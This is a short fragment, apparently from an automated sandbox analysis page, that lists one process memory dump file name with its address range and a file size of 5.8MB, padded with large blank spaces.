                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          5.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          5.8MB